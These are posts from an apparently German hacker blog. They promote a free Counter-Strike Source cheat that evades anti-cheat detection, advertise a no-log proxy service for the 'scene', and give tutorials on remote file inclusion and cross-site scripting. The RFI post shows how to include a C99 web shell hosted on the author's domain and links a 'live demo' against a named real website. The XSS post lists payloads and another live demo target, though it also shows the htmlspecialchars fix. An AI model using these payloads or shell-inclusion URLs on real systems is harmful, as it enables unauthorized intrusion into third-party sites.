Kleines Statement zur Downtime

Heyho,

wie vllt einige mitbekommen haben, hatte mein Blog seit Freitag (oder Donnerstag) eine Downtime welche 36h lang war. Sorry an alle Blog Leser. Problem war irgendwie an der MySQL DB und hier nen “kleines Statement” vom Hoster:

Das Problem lag am Ovh Netzwerk, denn dort war eine Störung.

Wird aber nicht mehr vorkommen, da ich demnaechst eh auf nen anderen Space umziehen werde.

Kartoffel-Hack 2.8

Nabend,

bevor ich nun mit meiner Tutorial Reihe fortfahre, wuerd ich gern auf ein Projekt von -tmh- hinweisen und kurz seinen Kartoffel-Hack vorstellen.

Was ist der Kartoffel-Hack?
Der Kartoffel-Hack ist ein von -tmh- gecodeter Cheat fuer Counter Strike Source, welcher seit ueber 590 Tagen von VAC² undetected, d.h. nicht erkannt wird.

Kostet der Kartoffel-Hack etwas?
Nein, nicht wie andere Cheats ist dieser Kostenlos auf kartoffel-hack.com erhaeltlich 😉

Readme:

Kartoffel Hack by -tmh- , Design by Tron
Version : 2.8 (18.01.2009)
VAC² Status: secure (No ban since > 596 days)
 
 
Features:
 
sv_cheat Bypass
sv_consistency Bypass
sv_pure 1 Bypass
No flash
No smoke
no sky
no colour
Wireframe WH
Chrome Mode
Grey Mode
Get it 1.6
ESP
Headshot Helper
Sniper Cross
No Scope
Sniper Pro
Radarhack
Radar Health
3rd Person 
Screen Cleaner
No Rain
Over your head
Speed Hack -
Speed Hack +
Speed Hack ++
Enable Hotkeys
Panic Key 
Settings ( ini file)
 
 
New :
- Some bugs fixxed
- PanicKey with deactivation of all features
 
Credits:
-tmh-
Tron
 
Thanks, Shouts, Support :
http://www.kartoffel-hack.com/

Screenshot:

Download:
*klick mich*

RFI – Ausnutzen einer RFI Luecke

Heyho,

konnte die letzten Tage leider nix posten, da ich etwas beschaeftigt war. Wollte ein SQL Injection Tutorial nun machen/posten jedoch will ich mir dafuer viel Zeit nehmen, damit vorallem Leute die neu in dieser Sache sind, es so gut wie moeglich verstehen, daher aufs Wochenende verschoben.

Heut versuch ich euch nen bissle etwas zu einer RFI (Remote File Inclusion) zu erlaeutern, wenn ich ne Live Demo noch finde, umso besser 😉

Etwas ueber eine LFI (Local File Inclusion) wird morgen kommen, da ich heute kopfweh habe und nemme so in guter Laune bin *g*

So RFI, was ist das ueberhaupt und was ist die Gefahr bei so einer Luecke?

Eine RFI Luecke kann ganz einfach entstehen, wenn man gerne auf einer Page etwas includet haben moechte, da sich das so mager anhoert versuch ich das in nem Source Beispiel zu erklaeren. Erstellen wir uns mal eine rfi.php Datei mit etwa diesem Inhalt:

<?php
 
if (isset($_GET['file']))
{
include($_GET['file']);
}
else
{
echo "Du hast kein File includet";
}
?>

Erinnert vllt bisschen an den Source Code von XSS Luecken, da wieder etwas ueber den GET Parameter uebergeben wird. Diesmal wollen wir den Inhalt einer auf unserem Server befindenden PHP Datei einfuegen.

Dazu erstellen wir eine blub.php Datei mit etwa diesem Inhalt:

<?php
echo "Das ist eine includete PHP Datei";
?>

Ganz simpler Echo Ausgabe Befehl, wie man sieht. Wenn man nun unsere URL aufruft (ich teste es wie immer auf localhost)

http://localhost/rfi.php

Erscheint unser Error:

Du hast kein File includet

Dann wollen wir uns unsere blub.php includen:

http://localhost/rfi.php?file=jap.php

Wird

Das ist eine includete PHP Datei

ausgegeben. D.h. unsere blub.php datei wurde dort eingefuegt bzw. ausgefuehrt.

Nun da RFI Remote File Inclusion heißt wird hier eine externe page includiert, die nicht auf dem Webspace vorhanden ist, als Beispiel wuerde das dann so aussehen:

http://localhost/rfi.php?file=http://www.google.de

Wenn nun dort auf der Page Google.de angezeigt wird, dann ist eine RFI Luecke vorhanden.

Vorraussetzung fuer eine RFI ist, dass allow_url_fopen, allow_url_include und register_globals on sind.

So nun brauchen wir ne Page mit ner C99.php shell als beispiel und includen diese (diese shell sollte in einem Format gespeichert sein, welches der Server nicht interpretiert sondern nur ausgibt, d.h. z.b. als .txt).

Sieht dann so aus:

http://localhost/rfi.php?file=http://j0hnx3r.org/c99.txt

Und zu sehen ist dann eine includete shell auf die ihr, wenn alles klappt, vollen Zugriff habt 🙂

Wie das ganze bei einer LFI aussieht erzaehl ich euch das naechste mal. Auch Sachen bezueglich Nullbyte werd ich noch ansprechen.

So hier noch schnell ne Live Demo:

http://www.gospelandmore.de//apboard/main.php/add.php?APB_rp=http://j0hnx3r.org/c99.txt??

Da koennt ihr bissle rumtesten *g*

Jow viel Spaß und ich hoff ihr habt vllt was neues gelernt 🙂

Falls ihr nen Fehler oder so findet, einfach in den Comments bescheid sagen, danke 🙂

SceneProxy.org – High anonymous Socks

Ich moecht euch heute SceneProxy.org vorstellen.

Warum mache ich auf dieses Projekt aufmerksam? Naja ein Grund ist, dass ich Floo kenne, aber auch da Proxys bzw Socks in der “Szene” wichtiger sind als damals. Damals hatte es keine Sau gejuckt bei ner SQL Injection oder aehnliches, heutzutage loggt jede Page alles, einfach schlimm.. ^^

Ich biete euch:

Ich biete euch SSH und HTTPS-Proxies an

  • 100% Nonlogging
  • Sehr sicher
  • Gute Anbindung
  • Location: Russland

Die Proxies wurden auf den Servern von www.heihachi.net aufgesetzt, sind somit extrem sicher.

Der Vorteil an SSH-Proxies:
Der Traffic wird zusätzlich noch verschlüsselt, somit habt ihr eine abhörsichere und direkte Tunnelung zu den Servern, die aufgestellt wurden.

Ich garantiere 30 Tage Uptime, kein Tag weniger oder mehr.
Nonblacklist ist wahrscheinlich, jedoch nicht garantiert.
Sollte der Server ausfallen wird euch die verlorene Zeit gutgeschrieben.

Solltet ihr euch für die HTTPS-Variante entscheiden:
Diese hat auch gewisse Vorteile gegenüber der SSH-Variante, wie zum Beispiel eine unkomplizierte Einbindung direkt in die Browsereinstellung.

Die Proxies sind zum anonymen surfen geeignet.
Es ist verboten den Dienst für Spamming zu missbrauchen!!
Wer seine Logindaten weitergibt wird ohne Vorwarnung vom Dienst ausgeschlossen

Wie installiere ich den Proxy?
HTTPS-Proxy:
Proxifier downloaden, Logindaten eingeben und als Proxytyp HTTPS angeben.
IP-Adresse und Port wird dir im Supportsystem mitgeteilt.

SSH-Proxy:
Tunnelier downloaden und die Profildatei laden, welche wir dir im Supportsystem zukommen lassen werde.
Proxifier downloaden, Logindaten eingeben und als Proxytyp HTTPS angeben.
Als IP-Adresse wird 127.0.0.1 angegeben, als Port 10000

Preis: 10€/30 Tage

Ich nehme offline erworbene Paysafecards ohne Geheimfrage an und Webmoney (NEU)

Wie bestelle ich?
Ihr meldet euch im Supportsystem vom Proxyshop, der unter http://sceneproxy.org erreichbar ist.
Sollte kein Supporter online sein, so hinterlasst euren gewünschten Loginname, euer Loginpasswort und den Paysafecardcode (inkl. Passwort) und tragt unbedingt eure echte Mailadresse ein, an die alles wichtige geschickt wird.
Auf der Homepage ist nochmals eine kleine FAQ.

Wir haben unsere Supporter, die für euch gerne Fragen beantworten.
Nutzt das System, damit eine spätere Zuordnung vereinfacht werden kann”

Effektiv Werben auf J0hnX3r.org – kleiner spaß 😉

XSS – Finden und beheben von Luecken

Heyho,

da ich gerade wieder ein bisschen Zeit habe, werde ich euch (natuerlich wieder mit kleinem Source Beispiel) zeigen wie und vorallem wo XSS (Cross-Site Scripting) Luecken sind. Mir ist auch klar das es einige gute XSS Tutorials gibt, aber ich glaub noch kein einzigstes, welches zeigt wie man so eine Luecke “schließt”. Wie man XSS ausnutzt werde ich ein anderes mal zeigen 😉

Jow was ist XSS (Cross-Site Scripting)?
Wie der Name eigentlich schon verraet geht es vorallem um “Scripting” also mit Scripten umgehen, weil bei einer XSS Attacke (gefaehrliche) Scripte ausgefuehrt werden. Damit kann man verschiedene Ziele erreichen, unter anderem ein sehr bekanntes und zwar das “Cookie klauen”. Darauf werd ich aber heute nicht genauer eingehen, sondern XSS –> Fremde Scripte werden ausgefuehrt!

Wie kann es passieren, dass eine Ausgabe zu einer gefaehrlichen XSS Luecke wird?
Ganz einfach, ein Coder moechte gerne eine Suchfunktion erstellen. Dort soll ausgegeben werden “Ihre Suche nach _das_Wort_ ergab X Treffer”. Leicht kann es passieren das der Coder die Ausgabe vom User nicht filtert, d.h. dass alle Usereingaben wieder ausgegeben wird. Ein gefaehrlicher Fehler.

Schauen wir uns das mal an einem Source Beispiel an:

<html>
<head><title>XSS Tutorial</title></head>
<body>
<?php echo $_GET['text']; ?>
</body>
</html>

Als xss.php speichern und irgendwo mal hochladen oder local ausfuehren.

So was passiert bei dieser Datei. Die Datei gibt das aus, was in der URL ueber den GET Parameter “text” eingegeben wird.

Also rufen wir sie mal auf 🙂

http://localhost/xss.php?text=Hallo Welt

Wenn wir nun auf Enter klicken/druecken, wird uns auf der Seite “Hallo Welt” angezeigt. Koennt auch jeden beliebigen Text benutzen.

Nun testen wir mal ob man auch Script ausfuehren kann, ganz einfach mit:

<script>alert(1337)</script>

in eure URL eingeben:

http://localhost/xss.php?text=<script>alert(1337)</script>

Je nach dem wie lustig ihr drauf seid und wenn magic_quotes (dieses ding mit dem backslashen von ‘ und “) aus sind, koennen wir auch

<script>alert("Hii my name is... ANGERFIIIST!")</script>

benutzen 🙂 Oder nen beliebigen anderen Text.

Manchmal kommt es auch vor, dass ein html tag erstmal unterbrochen werden muss. Dann muessen wir es mal mit

"><script>alert(1337)</script>

probieren 😉

Merkt man je nach Erfahrung dann auch von selber.

Um magic_quotes zu umgehen kann man auch String.fromChar() benutzen, ein XSS Befehl wuerde dann so aussehen:

<script>alert(String.fromCharCode(88,83,83))</script>

Jedoch wird man das nicht so oft als Anfaenger brauchen, denk ich..

Aufjedenfall ist bei unserem ersten Beispiel nun ein Popup gekommen mit dem Inhalt von 1337 – Da der Alert() Befehl auch 1337 (beim zweiten wars “Hii my name is… ANGERFIIIST!” und beim 3ten “XSS”) beinhaltet hatte. Also wurde unser Script ausgefuehrt was nun bedeutet, dass dort eine XSS Luecke vorhanden ist.

Gefaehrlich wenn sowas passiert. Wie fixx ich nun unseren Bug?

Die Funktion htmlspecialchars() ist hierbei sehr nuetzlich und effektiv (mehr Infos dazu: http://de.php.net/htmlspecialchars), da es Sonderzeichen in HTML – Codes umwandelt. Wie wendet man sie an? Nehmen wir nochmal unser Source Code Beispiel und fuegen dort htmlspecialchars() ein:

<html>
<head><title>XSS Tutorial</title></head>
<body>
<?php echo htmlspecialchars($_GET['text']); ?>
</body>
</html>

So wenn wir nun wieder

<script>alert(1337)</script>

oder anderes eingeben, wird uns das ausgegeben:

<script>alert(1337)</script>

Das Script wurde NICHT ausgefuehrt, doof gelaufen fuer den Angreifer 😀 Man kann dort nun so viel rummachen wie man will, die XSS Luecke ist gefixxt, dank htmlspecialchars.

So nun noch eine kleine Live Demo, gibt einige Google Dorks. Ich benutz meistens “ihre suche nach ergab treffer”

Live Demo:

http://www.pyroweb.de/ShopArtikel.php?SearchQuery=<script>alert(1337)</script>

So das war das zweite Tutorial meiner Großen Tutorial Reihe, ich hoff vorallem Anfaenger haben hierdurch einiges gelernt.

Beim naechsten Tutorial werd ich euch entweder zeigen wie ne SQL Injection funktioniert, oder noch schnell auf RFI/LFIs eingehen. 🙂